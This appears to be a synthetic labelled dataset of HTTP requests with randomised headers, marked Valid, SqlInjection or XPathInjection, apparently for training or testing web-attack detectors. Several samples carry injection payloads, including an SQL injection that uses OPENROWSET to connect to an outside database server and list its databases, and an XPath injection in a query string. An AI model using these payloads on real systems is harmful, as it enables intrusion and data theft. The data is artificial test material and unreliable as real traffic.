ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: diCxno
From: snso@neess.uk
If-Modified-Since: Mon, 18 May 09 07:10:27 GMT
If-Unmodified-Since: Sat, 30 Jul 05 01:41:00 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Jan 05 08:41:21 GMT
Max-Forwards: 0
MIME-Version: 4.6
Pragma: gyN='int'
Proxy-Authorization: NTLM dHN0TGN4NmVua2VzZGh4d3luZnJjM01TZnc4Tk51VGV6WmpubGVz
Authorization: NTLM bG1kdHNuYmF3bGxlT3R0dHN1cGxvZW40YXhXY3NsRXVhaA==
Range: -422,-567468,98305-
Referer: http://haVt87u.org/iCawtar/740sberg/hnrt/bi7w6nrl.php3
TE: trailers,gzip;q=0.9,gzip;q=0.3
Trailer: Connection
User-Agent: Mozilla/2.8 (compatible; twtrekro; Win 9x; etneAteA3d; Tnifoesn)
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7012x529
Via: 9.6 98.215.125.31, 6.3 1.180.3.254
Transfer-Encoding: compress
Upgrade: tmmsns/7.8, ettTn/1.8
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11400
Start - Id: 5888
class: Valid
PUT /lrIMPYtO_zlfO/lvsao/o9gftbA-J6tGzE9/6execIhttp9iX4EBJp/6tioa/qG9KGidbin/perxprwtmDior/oe/0ett8dejrm/tnoreo6hit0ysdi.jpg? HTTP/1.0
Content-Length: 71
Content-Language: aireNs0n,pnace9in,rc
Content-Encoding: identity
Content-Location: http://www.SmatthN.it/lshe/tmath4/bstmogev.dll
Content-MD5: aGEwZXVxcnJscm1ubkZ0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 19:57:11 UTC
Last-Modified: Mon, 28 Jun 04 19:36:24 GMT
Host: 21.66.243.126:80
Connection: raxtdst7
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.3, identity;q=0.6, identity, gzip
Accept-Language: *
Cache-Control: max-stale=4
Client-ip: 59.190.14.21
Cookie: KP9HznoVD0h=aAl@W.t2;onntetera5fNoh=ne9etses;rckdptAe=styresg;0y.dhthstyles=m
Cookie2: $Version="581"
Date: Thu, 08 Mar 07 13:47:58 UTC
ETag: W/"PIT7baSOcooW8aoQ-U"
Expect: iqlEeo
From: mOr4g@othliluhnF.org
If-Modified-Since: Tue, 16 Nov 04 12:01:41 CET
If-Unmodified-Since: Sun, 07 Mar 10 19:42:45 UTC
If-Match: *
If-None-Match: *
If-Range: "kaX.Eb-08366m1W.d."
Max-Forwards: 62
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM eUFlZWFzb3Ryb3VobGRQbGZyZW1obEU0b2x5bWFlaXJlb2NpU290
Authorization: Digest nc=33adA43B
Range: 7755-,3233-
Referer: /1tuotE6H/rtyNini.mpg
TE: deflate;q=0.0,trailers
Trailer: Warning
User-Agent: Mozilla/1.8 (Windows; U; WinNT 4.0; si-mt; rv:8.6.5) Gecko/64783682
UA-CPU: x86
UA-Disp: 895,7184,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 621x973
Via: 4.5 110.130.205.68, 7.6 15.4.239.50, iturA/9.4 www.at556.js:12939
Transfer-Encoding: identity
Upgrade: 1ncfmr/8.6, ihjw6/9.1, 6be57y/1.3, nouoie/8.5, sehtoe/9.2
Warning: 517 www.cRe1eoe2.js "y4eeAaytrtnxsi9a4ne" 
X-Forwarded-For: 229.92.118.231
X-Serial-Number: 673720584538972
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

opNweip1stsh=btoootI&iu3hdesa0hyS=A&omb2lgs&aLaaucerdcp=as4&o3setha=6

End - Id: 5888
Start - Id: 49465
class: XPathInjection
GET /iaJauets7sjfgaFcteh/2S5lMMQtmp/5PhavingR/afromjIAiEHd5JOI/shsslgcnk/0eeNicntg5iOtesxi5nn/rdjuot/ALQPN/atwwweE2jotaekr/zX8buVLuFN.tiff?Y4-eseT=4&etngs9h4M=2&dis7tua4nE=qA&thpoqi=zjqr52&16q@vCjGiframeVM=e-&fd1ljgdv=938+or+++++slDa%2Feilng%2FrTyEic%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D84%5D+++++or++++60%3D&o4NySrr=%5Cnnrhionsi HTTP/1.0
Host: www.dfooeres7e.be:80
Connection: keep-alive
Accept: audio/*;q=0.5, image/*;q=0.0, audio/*;q=0.5
Accept-Charset: cp-950;q=0.9
Accept-Encoding: 
Accept-Language: pl-q;q=0.8, ontld-tl7h2ee;q=0.8, ftthXint-ao5Tis;q=0.0, ao-arre
Cache-Control: min-fresh=0
Client-ip: 200.92.12.13
Cookie: GvbscripttelnetJ9b0=zosir
Cookie2: $Version="182"
Date: Fri, 10 Nov 06 14:23:19 GMT
ETag: "SmZqfMrAN90WPwXEG8YZ"
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Sun, 18 Apr 04 04:20:28 GMT
If-Match: "sZ2xhEON3HrNh@Y"
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 2073
MIME-Version: 1.5
Pragma: bo02l='l'
Proxy-Authorization: NTLM dGVuaWVyaGZibGZ3c2NzN2U1ZTlyaGxVbGJENWNvZWlzZExnYWdjQXRvc0FmdDc=
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: http://lte6hs.com/34ftcrki/emc4/be3yesB/5mserd/eHecbuhs.cfm
TE: trailers
Trailer: Cache-Control
User-Agent: t8kXBy2yIJ http://www.2yihc.gov
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 1.1 www.ars68hi.html, 7.1 36.237.244.148, 6.7 90.136.18.23:9475
Transfer-Encoding: deflate
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 7409387708
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49465
Start - Id: 25732
class: Valid
GET /SiIB1in1ncR3d/BQn/T_igoisxkLB3VPj/noht/5rG5systemy/dL2ot8oPxMLeuIV/wtBW4tCha/oldellehikns/sehnis/vvollTesas6ivt6eeodn/AincludeLmWnph-YujTnbmochaFs/ah7kohlthegitdW.jsp? HTTP/1.0
Host: www.onLpvdaeod.st:80
Connection: ginit
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress, deflate;q=0.4, gzip;q=0.3, compress;q=0.0
Accept-Language: w-pilsHnz;q=0.1, eNtrtid-2j;q=0.6, seesig-76emlin;q=0.5
Cache-Control: e=xaaulxh
Client-ip: 13.141.241.140
Cookie: mr=71223;iyGeYspea=httptn;iN:;dI0lR=esamynoQpg0aTrrM
Cookie2: $Version="25"
Date: Wed, 19 Nov 08 17:43:45 UTC
ETag: "l4q6uEO02zkcYJVjx5j"
Expect: rs6arew6
From: xschuvm@deiWYe.gov
If-Modified-Since: Wed, 28 Sep 05 20:23:38 UTC
If-Unmodified-Since: Tue, 10 Mar 09 05:33:06 GMT
If-Match: "NkVhB294tqE-OZMuU2Xn"
If-None-Match: "O6o-IMMZMOnRglbCqyD"
If-Range: *
Max-Forwards: 05
MIME-Version: 0.2
Pragma: swyet=Ad2nneh8
Proxy-Authorization: NTLM MW1DZWFzdGlJdTc1aGZhb016bkduNHJlMnByZ2lyaXVsSWl5YmNjN3d0c3RhaG50
Authorization: NTLM Y3ZvMmxpdG5ieWVlUm9PZXJhYW1tTVNldG14aGdzYnJhaXVlaGFhZGZuTWl0MG4=
Range: 5-5065,03839-,886020-
Referer: http://tezge.fr/sun7n/mvR7c/2pesorZa.tiff
TE: deflate,gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/7.4 (X11; U; Open BSD i386 4.3; 5o-op; rv:4.5.0) Gecko/21966941
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5684x8166
Via: HTTP/5.7 www.rmey8.jpeg, HTTP/3.2 www.Famte.jpeg
Transfer-Encoding: compress
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 612 www.1jatrt.shtml "npmzRiead4" 
X-Forwarded-For: 127.97.77.219
X-Serial-Number: 64360194
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25732
Start - Id: 28833
class: Valid
GET /o55m6o/I1/hYaNa8mHve7gv8hCj/aAEihj0xiblse/a.EitPHU/21d2unuf2brGwep/pivU24t/lbzmHjo2ZEM2B._/d2y4X@fZ2b/6fgVVPZbPfn3SGand/ag_rkz1HW.png? HTTP/1.1
Host: 183.215.142.214
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1258;q=0.9, iso-8859-1;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: eg-eiMt, e9ho-oal, lssstb-dretueta, aosiaai-yfAatcdi;q=0.8, ee7enAsy-fSaau0hm
Cache-Control: no-store
Client-ip: 216.169.139.61
Cookie: t5Y=083885;.rLsa=ditrcp;eanxUo=iesmrl(6cafN;R;6IoUg=85085;pugreyone=aPrdnHh0u;GrQwiL=3363620863
Cookie2: $Version="272"
Date: Mon, 07 Jul 08 16:14:05 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Tue, 02 Feb 10 09:21:06 GMT
If-Unmodified-Since: Tue, 11 Mar 08 05:36:12 UTC
If-Match: "fx3F6XvAeqa2Z1EKQx"
If-None-Match: *
If-Range: "MBHz9mzTnZ602rjL6"
Max-Forwards: 0
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM SW9oZW8yc1RiaU5lRXNzZDNwb3NsZWVzYWNRbWJpZWxkVTR4R2RxaA==
Authorization: Digest algorithm=lrtdp
Range: 3-,-55290
Referer: http://www.u7spo4S.org/aItI/LfeibNx/oiasd.php
TE: trailers,deflate,trailers
Trailer: Max-Forwards
User-Agent: aypat4rn (iGi06l; ux0q9wBCbU)
UA-CPU: 68000
UA-Disp: 550,6527,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: HTTP/7.7 158.228.54.167, 2.9 97.135.152.132
Transfer-Encoding: deflate
Upgrade: cweSe/4.5, 2wd0e/5.6, Ttl/1.4
Warning: 157 www.r3hkaor.js "yoe7ri8dLNtecrho" "Tue, 22 Sep 09 04:37:42 CET"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28833
Start - Id: 13129
class: Valid
GET /o_G40k/jbhm/o58PH1qvHMg6/7d68UoEerad/pIEvarndYBNl1ipasswdzK/mhb3-d4T/bjenmx2tj5luesss/dxiliieence/J0d7/0p_r-q.htm?eySiei=xnsi&ubETMhrh32=rabcoy3dehvon&pmwrea=ownsarnetcate%29na%7C%5D%27wB&oqbtGi=tKFMFNW6Db&eim=gO%7Coyoservices+Eronhttps+t&o9rljsteme=onrbinwinntt%40dndhkeotpasswd%3Eisystemtmp&SC4n2=xoaj3pbqThd&eiawtbs=aTvt44oHrfv&e1sqbt=hye%7Eiu7sl&dcplwtijmreseo=38278 HTTP/1.0
Host: www.eneiee.com
Connection: tlEf
Accept: audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.1, compress, compress;q=0.4
Accept-Language: umaMei-eiv
Cache-Control: no-transform
Client-ip: 165.9.69.137
Cookie: tuyDYUhcO1N=8324;eonencteie=nehey0oehirrn
Cookie2: $Version="578"
Date: Sun, 01 Jul 07 15:13:39 UTC
ETag: "EZnUQu-V3qHKvOtWYS"
Expect: 100-continue
From: rBs84eg@im6v.st
If-Modified-Since: Fri, 15 Feb 08 20:58:44 UTC
If-Unmodified-Since: Tue, 03 Feb 09 16:50:10 UTC
If-Match: "6yhC.wRMXxWcf8j-7"
If-None-Match: "oouVjjGnJJqciVilRZV"
If-Range: *
Max-Forwards: 865
MIME-Version: 1.5
Pragma: 2m=Nr
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Digest realm
Range: -6626
Referer: http://fgRd5.ch/cepEfhit/mbrRR0/cyadlos5.asp
TE: trailers,deflate,deflate
Trailer: Warning
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 3.3; oU-og; rv:6.9.5) Gecko/34212019
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: HTTP/3.6 83.100.196.193:2, 7.9 www.xiwts.tiff, HTTP/9.1 www.9rTdsscb.js
Transfer-Encoding: deflate
Upgrade: ieri/8.8, fihXea/0.2, pcuC/3.5
Warning: 988 www.pasceto.js "hpmirfwelzcei" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 6109336510742510
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13129
Start - Id: 34988
class: Valid
POST /0MoptGZkNkoU2dS7/2jshuearEd3v/6Ueseac42t/vWL.ONlKnkmritLHn/lF0/8ntshbsere6/anoamJmyh/eHvdcajlhs.tiff? HTTP/1.1
Content-Length: 42
Content-Language: eoHH,azt
Content-Encoding: compress
Content-Location: http://mhcdiur.de/iwot/e6kMhoOw/eTbue/lftmistr/eo5nh.tar
Content-MD5: M2RkZUdlcGRIZW1FdE9yZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 13 Jul 09 02:41:41 GMT
Host: 172.25.165.125:916
Connection: close
Accept: audio/*
Accept-Charset: iso-8859-1, euc-cn;q=0.5
Accept-Encoding: *
Accept-Language: mw-h, bhofbB-us4plE;q=0.4, sudOhthl-4ucDde
Cookie: nrrt2ibvoeb=82322726
Date: Sun, 15 Apr 07 20:16:37 CET
If-Modified-Since: Wed, 17 Oct 07 12:09:38 GMT
If-Unmodified-Since: Fri, 24 Mar 06 23:44:06 GMT
Max-Forwards: 05
Pragma: no-cache
Referer: /1mesr/ntOl.ace
TE: trailers,deflate
User-Agent: ll0sektug (iUZGUjmpQ; uedSDZQa; schim3jWxQ; atsCtoH0e)
Via: 8.5 128.56.81.25, 0.0 www.resls.html:44736, 6.3 www.oaEnH7lz.gif

waNC@7.hV9=r1hsF-Y-2YRG&QeZ4=519441&adh=56

End - Id: 34988
Start - Id: 35155
class: SqlInjection
PUT /0x/Gw7boiChk/u4z7e1tiel4/ctlapnhdr/trmtboxt/PhCRlB9vuOOwiM/oxZhmasNwet9wtvf6Mo/Eoh8aeIi/a0tAl/wp-.28BGW/t5ZBWN6uA8waKfqYVCU/p1CP.sUV70GMlEbII8.bin? HTTP/1.1
Content-Length: 418
Content-Language: tEdfAtn,ieon8Olr
Content-Encoding: compress
Content-Location: http://www.baeorett.st/px6vwkc/oTttn.mpg
Content-MD5: RGFvb2JGaWdsYnB5dWVEYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Sun, 12 Jun 05 23:53:54 CET
Host: 58.9.249.247
Connection: mrie
Accept: text/*
Accept-Charset: cp-936;q=0.3, utf-8, x-mac-japanese;q=0.7, cp-932
Accept-Encoding: compress, compress;q=0.4
Accept-Language: hr-nwmr
Cache-Control: o=cso
Client-ip: 230.250.218.171
Cookie: BUN8wJ=jform(gT?t;zmhloralelEele=iframemcatWSusua;eeue2iR1una=o1X8fQOJ7g;hoaekc4=shutdown2$eqtKl/ xr;st;bersqournicdtw=59961292
Cookie2: $Version="7"
Date: Sun, 30 Apr 06 17:39:13 GMT
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Wed, 18 Feb 04 07:49:34 CET
If-Match: "DungRIL0pC5V2ZHcs2zB"
If-None-Match: *
If-Range: *
Max-Forwards: 1038
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM cG5vZWhldjNpclR3aWZndWUzc2Vsb3RzZXFqZWZEODBlbmJqcm90d2VhbQ==
Range: 19-,8448-508426,664-75850
Referer: http://www.8nrcycl.net/BerdASGa/mnlh/ekta/s4BIett.exe
TE: deflate
Trailer: Host
User-Agent: Mozilla/5.6 (X11; U; Unix 6.3; ej-wi; rv:9.6.0) Gecko/42237284
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: hr1/3.1 www.o4s3em5e.jpeg:93456, 1.3 www.zmUtAft.html, 7.2 www.iLb7rPNa.jpeg:15025
Transfer-Encoding: compress
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 795 202.58.110.230 "nyEakndeio" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 1589979747
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe8eY=21428549&LaceR2rIprsongo=tSewo<?ao;aaAa6nao&h2nir8cobcil=b1jt&7pioabeirlsMi=copyspe)h&3etcDmGvp9NvEs=;    insert  into   OPENROWSET( 'SQLoledb','uid=hs;pwd=aiw;Network=DBMSSOCN;Address=88.146.137.91,1433;','select    *     from     _sysdatabases'  );    select  *     from  LinkedOrRemoteSrv1.master.dbo.sysdatabases&epnlaoomioAx==oi )qinUiroeui&ygidhto=ceOc

End - Id: 35155
Start - Id: 30280
class: Valid
GET /pC2vf@/uUzLVB.-W/ooZsDOsld/iRDCrTJy/SxaohrgI/hn4oqeltude/iks/oD90mWO92.sh?rAnecma=hqGk9&enetaxhx=390329&inY7hd=eDr&z4gO8yl=tdzseiiHCoear HTTP/1.1
Host: www.eruifbuvR5.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: rv-e;q=0.4
Cache-Control: no-cache
Client-ip: 126.177.121.250
Cookie: aatovoqrieembd=abtiierynwiffxaj;ssaBlnwnt=55190;n6ZNziHwau=511;intajnhh7wa=cVF5R1j;LIGF=nrn
Cookie2: $Version="6"
Date: Sun, 01 Jan 06 16:01:51 GMT
ETag: "qD-cIxWnIgufy6Wwdjh"
Expect: 100-continue
From: 6hwun6@maosnn.st
If-Modified-Since: Sun, 07 Nov 04 16:24:04 GMT
If-Unmodified-Since: Mon, 06 Mar 06 03:46:19 CET
If-Match: "I9S4KDmN0-HmKpp9f"
If-None-Match: *
If-Range: Tue, 08 Jul 08 16:28:30 GMT
Max-Forwards: 057
MIME-Version: 4.6
Pragma: t='amels'
Proxy-Authorization: Digest qop=auth
Authorization: esh7i grfeta2m=97ofa
Range: 52-
Referer: /nn4qd/heai.php3
TE: gzip,deflate;q=0.8
Trailer: Trailer
User-Agent: Mozilla/7.2 (compatible; MSIE 9.3; Linux i386; heBtotlnoB)
UA-CPU: MIPS
UA-Disp: 790,434,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9593x7407
Via: 4.7 44.129.0.125, tii/0.4 106.152.64.194, 8.3 70.88.116.182
Transfer-Encoding: deflate
Upgrade: fu6eud/5.9, gsnxrd/6.7
Warning: 817 93.133.40.203 "t2ar7ldre" 
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 686350212460
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30280
Start - Id: 41277
class: SqlInjection
GET /nseayxoeBjaEbo/npVdzMc/iosMjd6CwS@E/sb@Ybr0.asp?753yni9haetep7s=t4hEeorMblm&et=ms%29Ah HTTP/1.1
Host: 137.40.6.122
Connection: i1laci
Accept: image/gif
Accept-Charset: cp-932;q=0.8
Accept-Encoding: *
Accept-Language: spwar9h7-ts7, o-gasatu;q=0.6, fho2hM6-o, h-oEBw285S, inrs-fhfr
Cache-Control: max-stale=057
Client-ip: 22.64.104.193
Cookie: GSd3FTwhere9='     +     (   SELECT   TOP  1    hoeipoyr  FROM     io9n)   +     ';H0LgxKC=accepth;sij6nnrknbWedq=encia
Cookie2: $Version="7"
Date: Tue, 04 Oct 05 09:35:20 UTC
ETag: "RwUFwv_47PNnyMM"
Expect: eteab=inwd
From: elRhz@z5H6d.it
If-Modified-Since: Tue, 27 Apr 04 24:21:02 GMT
If-Unmodified-Since: Fri, 16 Jul 04 02:53:54 CET
If-Match: *
If-None-Match: *
If-Range: "44fZmDS5VELLVR5uMCI"
Max-Forwards: 614
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM aGFvd0NoYnVuaHN0bmVuT0VpbmUwdFFvaGYxZW9zZmE=
Range: 9564-
Referer: /czot4S/eaeueash/enonn.txt
TE: deflate;q=0.2
Trailer: From
User-Agent: Mozilla/1.0 (compatible; MSIE 1.3; SunOS sun4u; ndio; ooan; ioainsr)
UA-CPU: StrongARM
UA-Disp: 6178,926,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1296x4154
Via: FTP/0.5 www.rai8o0.htm, 4.0 www.nLeqpts.htm, 2.9 www.Reaa.shtml
Transfer-Encoding: identity
Upgrade: yEe/8.1, maee/7.8, t0msf/7.4
Warning: 494 71.104.42.110 "s3fsa4pwOuhshdioo" 
X-Forwarded-For: 7.111.55.106
X-Serial-Number: 891769847073825
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41277
Start - Id: 22538
class: Valid
GET /0rjnrr/olocationmochaqD/r7kLI6EIWxnB43E/dl/H4Htdshnidjf/bOeXAdiv8fO0htpassWJoaccess_log/mc_/tiESY.jsp?meqz=7280&kThyorf0=8PMhwXFpG6R&eoderjEIodlxtg=to8so HTTP/1.1
Host: www.igsdeln3.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: oeott6='nomh'
Client-ip: 19.89.43.104
Cookie: 1lma=609216;heiLt=s3g>y;dtikTSxzr=081;inosatjriT9ienr=floNM
Cookie2: $Version="75"
Date: Mon, 19 Jan 04 03:36:47 UTC
ETag: W/"qRAsoXvKX3eWGRV8Y"
Expect: 100-continue
From: tetoseli@i9ihet.it
If-Modified-Since: Mon, 29 Dec 08 03:14:09 CET
If-Unmodified-Since: Sat, 28 Aug 04 08:06:44 CET
If-Match: "d1@z.eUxY2oQQnWs"
If-None-Match: "5Dcy8L8Vb@Kt3PvO"
If-Range: "eJ6C06tfBzTBzPRsY"
Max-Forwards: 90
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: jibane sbzEioee=haeT
Authorization: Basic c2hpejpvN2Ruc0tlaA==
Range: 97-403959,415744-,056-023107
Referer: /hPlfraa/tuOt.exe
TE: chunked,trailers
Trailer: Accept
User-Agent: llkersh8oHik
UA-CPU: x86
UA-Disp: 699,5720,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1663x456
Via: FTP/4.9 www.mx1lo.tiff:05746
Transfer-Encoding: deflate
Upgrade: dee/5.9, qfbrt/1.6, eu9ds/0.9, eiadHn/3.8, aZty/3.6
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 0491740909145878411
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22538
Start - Id: 5729
class: Valid
PUT /nqsy9H-0lVx/fRbetweenVxkWCpu/o3O4dXzHoq/d0a/3W5.i@WVxg_IoI_/nBF/eEnwnK/6processing-instructionRjDgXa.gif? HTTP/1.1
Content-Length: 198
Content-Language: a2nltdec,mzc
Content-Encoding: identity
Content-Location: /jwrn/ge6s1c2c.sh
Content-MD5: Tm9hd2hod3dlZHAzaEdybQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Oct 04 21:16:43 UTC
Last-Modified: Tue, 21 Apr 09 08:57:14 CET
Host: 106.194.125.253
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-greek, x-mac-chinesetrad
Accept-Encoding: *;q=0.3
Accept-Language: htrpm-6inynii;q=0.7, mrs-srea5, oeeihE-dVkRolte;q=0.8, ay6bmo-cnse;q=0.5, mxntcTd-d4nn
Cache-Control: max-age=471
Client-ip: 65.73.49.131
Cookie: jSaa=no5Pn1;rrsrtgwaeaMehiw=0@dQJb;scriptKu6d=hEsg;og6a=359605;KriDLnetcats3_Jd=2625920
Cookie2: $Version="54"
Date: Sat, 15 May 04 17:20:46 GMT
ETag: "jiQXasEX@2DVqAIvgOV"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Wed, 12 May 04 17:42:00 UTC
If-Unmodified-Since: Wed, 26 Jan 05 23:50:29 GMT
If-Match: *
If-None-Match: "W40tz5EhMHqq-VJxn7"
If-Range: Wed, 28 Dec 05 20:33:46 CET
Max-Forwards: 223
MIME-Version: 8.6
Pragma: M=getam
Proxy-Authorization: NTLM YWVueHJpMXNlaGJoRHRqcmd4YW9Tck5lN29hZWhuQkkzZG1mbG9z
Authorization: NTLM dGVSc3R1aG5sc2NuSDEyZjMwbW9hb252bnRyY1Qzc2h1QTBydHJnZW9FZQ==
Range: 40090-
Referer: http://eein9j3h.org/tnFbt/otre/srm3sx/acgemi.sh
TE: trailers,chunked;q=0.1,trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.4 (compatible; ooOz; Open BSD i586; Jwj7silhss; ymfcsrof; ee1v2b)
UA-CPU: PowerPC
UA-Disp: 830,2987,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3416x9061
Via: HTTP/6.4 www.wIaoznom.js, HTTP/9.8 204.236.97.165, 0.7 www.fSd9ra.jpg
Transfer-Encoding: compress
Upgrade: soi/5.7, trhldd/2.6
Warning: 489 154.132.50.60 "g8mjyetalehBscHn" 
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 84946
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VdeletedocumentCEXS=s5hcyl&eEhvqta1gtrnnn=rqs9gh r&nok=hT0&fttr=605&rt=aee&bni=hssamo  enAraq&RMinput8IuOn=7948&tntKSd=eshscIgstmeetAnetq&edae9eT3aonf=589529&rh=ndyMJG&Nougutrt=193&ah7t5ioanal=21917

End - Id: 5729
Start - Id: 21486
class: Valid
GET /sr/WbK/ltmdhnFxai/dmosc6o5erVmiwage/Ea/e49x6G_qpNh0/cVr/IXTOjB1bodyVt6form/dmef36m9nn.htm?D0mhome4kGEt2o=97&oaoa9ti=echoyvar HTTP/1.1
Host: www.inee.com
Connection: close
Accept: video/mpeg, application/x-tar;q=0.6
Accept-Charset: euc-jp, big5;q=0.3
Accept-Encoding: *
Accept-Language: Zh9j-f1i;q=0.4, dgds-naoayw7n, i-te, stuKiy-pe;q=0.3
Cache-Control: no-store
Client-ip: 186.35.24.227
Cookie: dutfwnyoaooss=rzmidiwsvlu ti 
Cookie2: $Version="99"
Date: Tue, 07 Oct 08 02:27:01 GMT
ETag: W/"36J4sFxeTxvFZxRJ"
Expect: fqebpthu=4dnEm
From: n6aee@n6bro.ch
If-Modified-Since: Thu, 11 Jan 07 05:29:24 CET
If-Unmodified-Since: Fri, 02 Nov 07 20:32:20 UTC
If-Match: *
If-None-Match: "dURQVtlcDntGa9mtq"
If-Range: "7DMhuwSUepk7BpgIijO"
Max-Forwards: 600
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: NTLM QWl1NGJyYTRpZHhldGU4aGJvd1RyYm9jZW1qemlzbERpRA==
Range: -90,-13698,843877-
Referer: /e7iSU2T/tswjus/9hmu.conf
TE: trailers,deflate;q=0.2
Trailer: Connection
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 7.9; 2t-i3; rv:5.1.6) Gecko/89990746
UA-CPU: PowerPC
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7753x3387
Via: rriseE/6.2 www.1hCrit9.png, 8.0 71.119.238.211
Transfer-Encoding: e8ji; mruHoyls=qlitt
Upgrade: Hnpe3d/2.9, aor/1.2, Unn8/1.9, tgr5/3.9
Warning: 330 189.225.52.93 "T7te" "Sat, 09 May 09 16:52:03 CET"
X-Forwarded-For: 20.195.227.96
X-Serial-Number: 099160338549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21486
Start - Id: 3455
class: Valid
